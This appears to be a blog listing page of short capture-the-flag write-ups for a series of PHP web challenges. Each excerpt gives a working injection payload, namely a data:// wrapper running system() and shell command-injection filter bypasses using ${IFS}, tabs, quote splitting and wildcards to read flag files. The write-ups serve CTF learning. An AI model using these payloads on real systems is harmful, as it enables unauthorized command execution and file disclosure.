摘要: 利用data://text/plain, payload:?file=data://text/plain,<?php system("cat flag.php");?> 阅读全文
posted @ 2021-02-03 15:48 z1ten9 阅读(207) 评论(0) 推荐(0)
摘要: 方法一:利用paste查看文件内容 payload:?c=paste$fla?.php 方法二: payload:/bin/?at${IFS}f??????? 可以理解为当前目录运行cat命令实际上运行的也是bin/cat,而通配符不会帮你去找到bin下面的cat 只会在当前目录寻找能通配的文件,所 阅读全文
posted @ 2021-02-03 11:07 z1ten9 阅读(269) 评论(0) 推荐(0)
摘要: payload?c=nl${IFS}fl""ag.php%0a 阅读全文
posted @ 2021-02-02 21:52 z1ten9 阅读(100) 评论(0) 推荐(0)
摘要: 先利用?c=nl${IFS}fl""ag.php%0a查看flag.php,发现里面没有flag,被骗😓 再利用?c=ls${IFS}/%0a查看根目录文件,发现flag 最后使用?c=nl${IFS}/fl""ag%0a显示出flag 阅读全文
posted @ 2021-02-02 21:45 z1ten9 阅读(169) 评论(0) 推荐(0)
摘要: 同web50 payload:?c=nl<>fl""ag.php%0a 阅读全文
posted @ 2021-02-02 21:33 z1ten9 阅读(80) 评论(0) 推荐(0)
摘要: 在web49的基础上想办法以其他方式绕过空格 payload:?c=nl<>fl""ag.php%0a 阅读全文
posted @ 2021-02-02 21:27 z1ten9 阅读(140) 评论(0) 推荐(0)
摘要: 同web48 payload:?c=nl%09fl""ag.php%0a 阅读全文
posted @ 2021-02-02 21:26 z1ten9 阅读(62) 评论(0) 推荐(0)
摘要: 还可以使用fl""ag来绕过flag payload:?c=nl%09fl""ag.php%0a 阅读全文
posted @ 2021-02-02 19:00 z1ten9 阅读(67) 评论(0) 推荐(0)
摘要: 在web46的基础上过滤了几个查看内容的命令:more|less|head|sort|tail 我们使用nl来进行查看 payload:?c=nl%09fla?.php%0a 阅读全文
posted @ 2021-02-02 18:57 z1ten9 阅读(84) 评论(0) 推荐(0)
摘要: 在web45的基础上过滤了数字,$,* payload?c=more%09fla?.php%0a %09即tab 阅读全文
posted @ 2021-02-02 18:54 z1ten9 阅读(111) 评论(0) 推荐(0)